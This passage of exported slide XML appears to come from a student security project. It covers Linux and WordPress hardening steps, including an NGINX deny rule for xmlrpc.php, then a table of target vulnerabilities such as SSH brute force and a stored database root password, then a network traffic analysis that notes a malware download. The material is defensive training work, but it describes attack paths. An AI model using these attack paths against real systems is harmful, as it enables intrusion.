            <a:pPr marL="914400" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>continued editing for /etc/pam.d/common-password</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minclass=2 (or 3) can be added to set the minimum number of required classes of characters (upper,lower,or special)</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3657600" lvl="7" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password		requisite 			pam_pwqality.so retry=3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minclass=2 </a:t>
            </a:r>
            <a:endParaRPr sz="16000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="4" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Also for added security, to make sure that the same password (at least going back by 5) is not reused you can edit the line</a:t>
            </a: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password		[success=2 default=ignore]		pam_unix.so obscure use_authok try_first_pass sha512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> remember=5</a:t>
            </a:r>
            <a:endParaRPr sz="16000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2743200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="16000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now let's change the the permissions of the wp_config file to root user to minimize it’s access and corruptions</a:t>
            </a:r>
            <a:endParaRPr sz="16000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod 700 /var/www/html/wordpress/wp-config.php</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9" name="Google Shape;509;p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49</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="1761350"/>
            <a:ext cx="22942800" cy="117396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forget to modify the NGINX configuration files in the WordPress theme’s functions.php file to prevent the wpscan.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block XMLRPC:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2743200" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location ^~ /xmlrpc.php {</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deny all;</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error_page 403 =404 /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The best way to make sure that you’ve got the most current patches is to...</a:t>
            </a:r>
            <a:endParaRPr sz="4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500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ALWAYS REMEMBER TO REGULARLY UPDATE ALL SOFTWARE!!</a:t>
            </a:r>
            <a:endParaRPr sz="45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 			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt-get update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sudo apt-get upgrade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It’s always good to keep your Linux OS up-to-date from time to time!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do-release-upgrade -d                                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stay Updated</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">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en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … or get hacked</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="Google Shape;511;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18281300" y="9138700"/>
            <a:ext cx="5378850" cy="4080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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;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5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p2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44" name="Google Shape;144;p22"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176950" y="323412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If SSH (Port 22) is left open, the possibility of a brute-force attack.</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craft an attack method via open SSH port. ie brute force attack and or SSH Metasploit.</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aim is to identify valid usernames on the system.</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gather information such as username and determine the approach used in attack.</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software does not implement sufficient</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measures to prevent multiple failed</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authentication attempts within in a short time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frame, making it more susceptible to brute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force attacks.</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will have a high impact because attacker  will access the network and when this happens, so many dangerous possibilities can happen like creating a back door.</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Database root password was stored in an application configuration file. </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has a high impact because if threat actor gains access to machine, the password will be easily available and he can quickly gain access to the database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Allows limited local users to gain privileges via</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 Python script.</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is dangerous because an attacker who broke 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with limited access, can morph and gain admin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privileges. With that, lots of destructive possibilities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like root access and ability to create a backdoor will</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be possible.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17" name="Google Shape;517;p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50</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p67"/>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III: Network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519" name="Google Shape;519;p67"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part III: Network Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Google Shape;526;p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51</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Google Shape;527;p6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28" name="Google Shape;528;p6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529" name="Google Shape;529;p68"/>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Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-196300" y="596236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  Normal Activity</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="8236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Malicious Activity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9"/>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Traffic Profile</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37" name="Google Shape;537;p6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52</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Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p7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53</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p7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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our analysis identified the following characteristics of the traffic on the network: </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="545" name="Google Shape;545;p70"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176950" y="302247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1170000">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Feature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Value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Description</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Top Talkers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172.16.4.205 (31.6%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>185.243.115.84 (18.1%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>10.0.0.201 (16.1%)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Machines that sent the most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Most Common Protocols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TCP (89.0%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>UDP (10.9%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>NONE (.1%)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Three most common protocols on the network.</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 of Unique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831 (IPv4)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>11 (IPv6)</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Count of observed IP addresses.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Subnets </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10.6.12.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>172.16.4.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>10.0.0.0/24</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Observed subnet ranges.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 of Malware Species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 (june11.dll)</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Number of malware binaries identified in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Behavioral Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p71"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Purpose of Traffic on the Network</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Google Shape;553;p7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54</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p71"/>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55" name="Google Shape;555;p71"/>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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users were observed engaging in the following kinds of activity.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Watching YouTube</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Online Shopping from Amazon</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-428307" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91291"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DHCP Requests</a:t>
            </a:r>
            <a:endParaRPr sz="4052">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Downloading and Installing Desktop Wallpapers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suspicious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Malware Download</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Malware Outbound Traffic</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Torrent Downloads</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="556" name="Google Shape;556;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15679425" y="8447209"/>
            <a:ext cx="7966775" cy="466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Normal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62" name="Google Shape;562;p7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55</a:t>
            </a:fld>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Web Browsing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;p7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1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="11600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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570" name="Google Shape;570;p7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
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p7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72" name="Google Shape;572;p7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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed majority of the HTTP traffic on port 80.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The network users did the following during office hours:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloading files from website such as:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://detectportal.firefox.com/success.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uploading files to a website such as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://mysocalledchaos.com/wp-content/upload/2018/02/Beauty.jpg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online shopping at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
